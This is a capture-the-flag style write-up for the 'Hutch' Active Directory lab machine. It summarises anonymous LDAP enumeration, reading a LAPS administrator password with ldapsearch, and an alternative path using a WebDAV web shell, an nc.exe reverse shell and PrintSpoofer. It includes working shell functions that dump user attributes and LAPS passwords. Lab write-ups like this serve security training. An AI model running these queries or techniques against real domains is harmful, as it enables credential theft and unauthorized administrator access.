Hutch Proving Grounds Write-Up
SUMMARY
This write-up covers the Hutch machine from OffSec’s Proving Grounds, an Active Directory environment where unauthenticated (anonymous) access to LDAP provided the initial foothold.
Running ldapsearch without credentials exposed a password stored in a user attribute. Cross-referencing the dump showed the password belonged to fmcsorley. After validating the credentials with netexec, BloodHound was used to analyze domain privileges and showed that fmcsorley held the ReadLAPSPassword right. A second ldapsearch query, authenticated as fmcsorley and targeting the ms-Mcs-AdmPwd attribute, returned the local Administrator password in cleartext (legacy LAPS stores it unencrypted, readable by any principal granted that right), completing the machine.
An alternative path was also explored: fmcsorley’s credentials allowed connecting to an IIS WebDAV service via cadaver. Since the PUT method was enabled, a cmd.aspx web shell was uploaded and used to execute commands. nc.exe was then transferred to the machine, a reverse shell was established, and the SeImpersonatePrivilege held by the account the web shell ran under was abused via PrintSpoofer64.exe to escalate to Administrator.
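The primary path above comes down to two LDAP queries and reading their output correctly. As an added example (not code from the original write-up), the queries are written out below as shell functions, together with a small LDIF reader that pulls one attribute out of ldapsearch output. DC_IP, BASE_DN, the bind user and every value in SAMPLE_LDIF are assumed placeholders, not data from the machine.

```shell
#!/bin/sh
# Added example, not code from the original write-up. DC_IP, BASE_DN and all
# values in SAMPLE_LDIF are assumed placeholders, not data from the Hutch box.

DC_IP="${DC_IP:-10.10.10.10}"                # assumption: domain controller address
BASE_DN="${BASE_DN:-DC=example,DC=local}"    # assumption: search base

# Step 0: the rootDSE is readable anonymously and tells you the real base DN.
discover_base_dn() {
    ldapsearch -x -H "ldap://$DC_IP" -s base -b "" namingContexts
}

# Step 1: anonymous bind, dump every user with its description field. A
# password parked in description (or a comment/info field) shows up here.
anon_user_dump() {
    ldapsearch -x -H "ldap://$DC_IP" -b "$BASE_DN" \
        "(objectClass=user)" sAMAccountName description
}

# Step 2: bind as the principal BloodHound showed with ReadLAPSPassword and ask
# only for the LAPS attribute. $1 is a bind DN or UPN (AD accepts user@domain
# for a simple bind), $2 the password. Computers this account may not read
# simply come back without the attribute.
laps_dump() {
    ldapsearch -x -H "ldap://$DC_IP" -b "$BASE_DN" -D "$1" -w "$2" \
        "(ms-Mcs-AdmPwd=*)" ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
}

# Print every value of attribute $1 from LDIF on stdin, one per line.
# Two LDIF rules bite when grepping raw ldapsearch output: long values are
# folded onto continuation lines that begin with a space, and values that are
# not "safe" strings (leading/trailing space, leading colon, non-ASCII, ...)
# are emitted as "attr:: <base64>". Both are undone here.
ldif_attr() {
    attr="$1"
    # unfold continuation lines, then match the attribute name
    sed -e :a -e '$!N;s/\n //;ta' -e 'P;D' |
    while IFS= read -r line; do
        case "$line" in
            "$attr:: "*) printf '%s' "${line#"$attr:: "}" | base64 -d; echo ;;
            "$attr: "*)  printf '%s\n' "${line#"$attr: "}" ;;
        esac
    done
}

# Constructed sample shaped like ldapsearch output (placeholder data): one user
# with a folded description, one with a base64 description (the trailing space
# makes it unsafe LDIF), and one computer carrying a LAPS password.
SAMPLE_LDIF='dn: CN=jdoe,CN=Users,DC=example,DC=local
sAMAccountName: jdoe
description: Backup of default creds for the helpdesk team, do not share: Pass1
 23!

dn: CN=svc_backup,CN=Users,DC=example,DC=local
sAMAccountName: svc_backup
description:: SHVudGVyMiA=

dn: CN=DC01,OU=Domain Controllers,DC=example,DC=local
ms-Mcs-AdmPwd: )Kq8.zR2wL;e6Hp
ms-Mcs-AdmPwdExpirationTime: 133500000000000000
'

# Offline demo on the constructed sample. Against a live DC the same readers
# consume the real queries:  anon_user_dump | ldif_attr description
#                            laps_dump 'user@example.local' 'pass' | ldif_attr ms-Mcs-AdmPwd
printf '%s' "$SAMPLE_LDIF" | ldif_attr description
printf '%s' "$SAMPLE_LDIF" | ldif_attr ms-Mcs-AdmPwd
```

The `::` case is the one that makes a plain `grep -i password` miss things: a description with a trailing space or a non-ASCII character arrives base64-encoded and never matches. The attribute name also matters: ms-Mcs-AdmPwd is the legacy LAPS attribute; domains on the newer Windows LAPS expose msLAPS-Password (and msLAPS-EncryptedPassword) instead, so the filter in laps_dump has to change accordingly.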
PATH TO FOLLOW
Primary Path:
- Reconnaissance & Unauthenticated LDAP Enumeration
- Cleartext Credential Discovery in User Attribute
- BloodHound Analysis & ReadLAPSPassword Identification
- LAPS Password Retrieval via ldapsearch
- Administrator Access
Alternative Path:
- WebDAV Discovery & cadaver Authentication
- ASPX Web Shell Upload via HTTP PUT
- Reverse Shell via nc.exe
- Abusing SeImpersonatePrivilege with PrintSpoofer
- Shell as Administrator
Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.